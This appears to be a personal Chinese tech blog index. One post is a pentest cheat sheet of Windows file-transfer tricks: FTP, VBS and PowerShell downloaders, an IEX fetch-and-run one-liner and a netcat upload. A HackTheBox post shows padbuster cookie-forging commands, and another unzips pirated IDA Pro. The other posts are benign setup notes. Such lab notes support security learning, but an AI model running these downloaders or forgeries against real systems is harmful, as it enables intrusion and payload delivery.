瞎几把XI[U]E

hack-skill

发表于 2020-04-07 分类于 hackstuff
本文字数： 2.8k 阅读时长 ≈ 3 分钟

windows shell 中文乱码

chcp 65001

upx && exe2hex 传输文件

upx -9 nc.exe

exe2hex -x nc.exe -p nc.cmd

cat nc.cmd |xclip -selection clipboard

ftp 传输文件

echo open 192.168.0.2 21> ftp.txt
echo USER d2x3>> ftp.txt
echo passwd>> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo byte >> ftp.txt

ftp -v -n -s:ftp.txt

vbs 传输文件

echo URL = WScript.Arguments(0)> wget.vbs
echo saveTo = WScript.Arguments(1)>> wget.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP")>> wget.vbs
echo objXMLHTTP.open "GET", URL, false>> wget.vbs
echo objXMLHTTP.send()>> wget.vbs
echo If objXMLHTTP.Status = 200 Then>> wget.vbs
echo Set objADOStream = CreateObject("ADODB.Stream")>> wget.vbs
echo objADOStream.Open>> wget.vbs
echo objADOStream.Type = 1 >> wget.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody>> wget.vbs
echo objADOStream.Position = 0>> wget.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject")>> wget.vbs
echo If objFSO.Fileexists(saveTo) Then objFSO.DeleteFile saveTo>> wget.vbs
echo Set objFSO = Nothing>> wget.vbs
echo objADOStream.SaveToFile saveTo>> wget.vbs
echo objADOStream.Close>> wget.vbs
echo Set objADOStream = Nothing>> wget.vbs
echo End if>> wget.vbs
echo Set objXMLHTTP = Nothing>> wget.vbs
echo WScript.Quit>> wget.vbs

cscript wget.vbs http://192.168.31.80:8000/nc.exe nc.exe

powershell 传输文件

echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://192.168.31.80:8000/nc.exe" >>wget.ps1
echo $file = "nc.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

#一句话
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source="""http://192.168.31.80:8000/nc.exe"""; $destination="""nc.exe"""; $http=new-object System.Net.WebClient; $response=$http.DownloadFile($source,$destination);"

#一句话2
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.31.80:8000/nc.exe', 'ncccc.exe')

powershell 执行脚本

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.31.80:8000/helloworld.ps1')

php 传输文件

<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.31.80/upload.php', 'evil.exe)

tftp 传输文件

#server
sudo apt install atftp
sudo mkdir /tftp
sudo chown nobody: /tftp
sudo atftpd --daemon --port 69 /tftp

#client
tftp -i 192.168.31.80 put stuff.exe

msf && armitage

发表于 2020-03-21 分类于 hackstuff
本文字数： 1.9k 阅读时长 ≈ 2 分钟

环境

OS: Debian GNU/Linux 10

安装msf和armitage

阅读全文 »

I know Mag1k

发表于 2020-03-18 分类于 hackthebox ， challenges
本文字数： 640 阅读时长 ≈ 1 分钟

知识点

padding-oracle-decryption-attack

padbuster http://docker.hackthebox.eu:30461/profile.php RGsT1ajC8r%2FbC7hIlR0zwvjHmyCDpKRMuN%2BnJOMTAFL1pPoeKW3VKw%3D%3D 8 --cookie "iknowmag1k=RGsT1ajC8r%2FbC7hIlR0zwvjHmyCDpKRMuN%2BnJOMTAFL1pPoeKW3VKw%3D%3D;PHPSESSID=sorl5p4mv2msjhonpj552oqia3"

padbuster http://docker.hackthebox.eu:30461/profile.php RGsT1ajC8r%2FbC7hIlR0zwvjHmyCDpKRMuN%2BnJOMTAFL1pPoeKW3VKw%3D%3D 8 --cookie "iknowmag1k=RGsT1ajC8r%2FbC7hIlR0zwvjHmyCDpKRMuN%2BnJOMTAFL1pPoeKW3VKw%3D%3D;PHPSESSID=sorl5p4mv2msjhonpj552oqia3" --plaintext '{"user":"user","role":"admin"}'

注册 Hack the box

发表于 2020-03-17 分类于 hackthebox ， register
本文字数： 1.5k 阅读时长 ≈ 1 分钟

流程

https://www.hackthebox.eu/invite

F12调出控制台

可疑js https://www.hackthebox.eu/js/inviteapi.min.js

阅读全文 »

android device monitor stuck in macos

发表于 2020-03-01 分类于 dev
本文字数： 403 阅读时长 ≈ 1 分钟

https://archive.eclipse.org/eclipse/downloads/drops4/R-4.9-201809060745/download.php?dropFile=swt-4.9-cocoa-macosx-x86_64.zip

cd {Androidsdk path}/tools/lib/monitor-x86_64/plugins
cp ~/Downloads/swt-4.9-cocoa-macosx-x86_64/swt.jar .
mv org.eclipse.swt.cocoa.macosx.x86_64_3.100.1.v4236b.jar org.eclipse.swt.cocoa.macosx.x86_64_3.100.1.v4236b.jar.old
mv swt.jar org.eclipse.swt.cocoa.macosx.x86_64_3.100.1.v4236b.jar

install macos 10.14 mojave in virtualbox

发表于 2020-02-07 分类于 mac
本文字数： 2.5k 阅读时长 ≈ 2 分钟

准备工作

brew cask install virtualbox
brew cask install virtualbox-extension-pack

阅读全文 »

macos unzip Illegal byte sequence

发表于 2020-02-05 分类于 mac
本文字数： 833 阅读时长 ≈ 1 分钟

问题如下

➜  ida unzip ida7.zip
Archive:  ida7.zip
https://www.52pojie.cn
https://down.52pojie.cn/Tools/Disassemblers/
  inflating: ReadME.txt
  inflating: x64_idapronm_hexarm64m_hexarmm_hexx64m_hexx86m_170914_e723c5648dc3f2f588ab8339ccf62ec0.zip
error:  cannot create +ߦ����-���.url
        Illegal byte sequence
error:  cannot create IDA MacOS Pro 7.0 +ѥ��=-�+�Ԧ-+�+�+�����idb�̩-.zip
        Illegal byte sequence

阅读全文 »

关于黑苹果的那些事

发表于 2017-08-06 更新于 2019-11-11 分类于 mac
本文字数： 2.4k 阅读时长 ≈ 2 分钟

黑苹果

用u盘可以引导
同样安装了clover的hdd看不到引导
已经设置uefi only
解决方法：从U盘引导进clover，利用clover里的uefi shell 安装引导

阅读全文 »

nethunter

发表于 2019-09-07 更新于 2019-09-11 分类于 linux
本文字数： 2.8k 阅读时长 ≈ 3 分钟

准备工作

我的手机

oneplus2 (型号: ONE A2001)
阅读全文 »

git-proxy

发表于 2019-09-08 分类于 tools
本文字数： 342 阅读时长 ≈ 1 分钟

有时候在github或gitlab这些仓库clone项目，因为被墙了，没有使用代理阿之类的因由，下不下来

类似这些

remote: Compressing objects: 100% (4455/4455), done.
Timeout, server gitlab.com not responding. MiB | 7.00 KiB/s
fatal: the remote end hung up unexpectedly
fatal: early EOF

而git clone 的时候用的是.git结尾的连接，这个时候就需要配置一下ssh代理访问这个仓库

$ vim ~/.ssh/config
Host gitlab.com
 HostName gitlab.com
 Port 22
 ProxyCommand nc -v -x 127.0.0.1:1080 %h %p